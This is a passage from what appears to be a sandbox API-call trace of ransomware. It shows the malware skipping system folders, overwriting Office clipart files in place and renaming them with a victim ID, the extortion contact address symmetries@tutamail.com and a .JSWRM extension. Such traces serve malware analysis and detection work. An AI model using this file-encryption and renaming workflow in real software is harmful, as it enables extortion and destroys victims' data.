1 [0088.432] lstrcmpiW (lpString1="J0239057.WMF", lpString2="..") returned 1 [0088.432] lstrcmpiW (lpString1="J0239057.WMF", lpString2="...") returned 1 [0088.432] lstrcmpiW (lpString1="J0239057.WMF", lpString2="windows") returned -1 [0088.432] lstrcmpiW (lpString1="J0239057.WMF", lpString2="recovery") returned -1 [0088.432] lstrcmpiW (lpString1="J0239057.WMF", lpString2="perflogs") returned -1 [0088.432] lstrcmpiW (lpString1="J0239057.WMF", lpString2="documents and settings") returned 1 [0088.432] lstrcmpiW (lpString1="J0239057.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.433] lstrcmpiW (lpString1="J0239057.WMF", lpString2="system volume information") returned -1 [0088.433] lstrcmpiW (lpString1="J0239057.WMF", lpString2="msocache") returned -1 [0088.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0088.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239057.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239057.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239057.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0088.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0088.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239057.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239057.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239057.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0088.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239057.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.433] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4740) returned 1 [0088.433] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1280) returned 0x205850 [0088.433] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1280, lpOverlapped=0x0) returned 1 [0088.453] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.453] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1280, lpOverlapped=0x0) returned 1 [0088.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.453] CloseHandle (hObject=0x314) returned 1 [0088.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0088.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0088.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0088.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0088.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0088.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.454] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239057.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239057.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0088.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.455] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239063.WMF", cAlternateFileName="")) returned 1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2=".") returned 1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="..") returned 1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="...") returned 1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="windows") returned -1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="recovery") returned -1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="perflogs") returned -1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="documents and settings") returned 1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="system volume information") returned -1 [0088.455] lstrcmpiW (lpString1="J0239063.WMF", lpString2="msocache") returned -1 [0088.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0088.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239063.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239063.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239063.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0088.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0088.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239063.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239063.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239063.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0088.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239063.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.456] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5884) returned 1 [0088.456] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16f0) returned 0x205850 [0088.456] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16f0, lpOverlapped=0x0) returned 1 [0088.458] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.458] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16f0, lpOverlapped=0x0) returned 1 [0088.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.458] CloseHandle (hObject=0x314) returned 1 [0088.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0088.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0088.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0088.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0088.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0088.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.459] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239063.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239063.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0088.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.460] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1294, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239079.WMF", cAlternateFileName="")) returned 1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2=".") returned 1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="..") returned 1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="...") returned 1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="windows") returned -1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="recovery") returned -1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="perflogs") returned -1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="documents and settings") returned 1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="system volume information") returned -1 [0088.460] lstrcmpiW (lpString1="J0239079.WMF", lpString2="msocache") returned -1 [0088.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0088.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239079.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239079.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239079.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0088.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0088.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239079.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239079.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239079.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0088.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0088.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239079.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.461] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4756) returned 1 [0088.461] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1290) returned 0x205850 [0088.461] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1290, lpOverlapped=0x0) returned 1 [0088.462] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.463] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1290, lpOverlapped=0x0) returned 1 [0088.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.463] CloseHandle (hObject=0x314) returned 1 [0088.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0088.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0088.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0088.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0088.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0088.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.464] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239079.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239079.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0088.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.464] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1464, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239191.WMF", cAlternateFileName="")) returned 1 [0088.464] lstrcmpiW (lpString1="J0239191.WMF", lpString2=".") returned 1 [0088.464] lstrcmpiW (lpString1="J0239191.WMF", lpString2="..") returned 1 [0088.464] lstrcmpiW (lpString1="J0239191.WMF", lpString2="...") returned 1 [0088.464] lstrcmpiW (lpString1="J0239191.WMF", lpString2="windows") returned -1 [0088.464] lstrcmpiW (lpString1="J0239191.WMF", lpString2="recovery") returned -1 [0088.465] lstrcmpiW (lpString1="J0239191.WMF", lpString2="perflogs") returned -1 [0088.465] lstrcmpiW (lpString1="J0239191.WMF", lpString2="documents and settings") returned 1 [0088.465] lstrcmpiW (lpString1="J0239191.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.465] lstrcmpiW (lpString1="J0239191.WMF", lpString2="system volume information") returned -1 [0088.465] lstrcmpiW (lpString1="J0239191.WMF", lpString2="msocache") returned -1 [0088.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239191.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239191.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239191.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239191.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239191.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239191.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 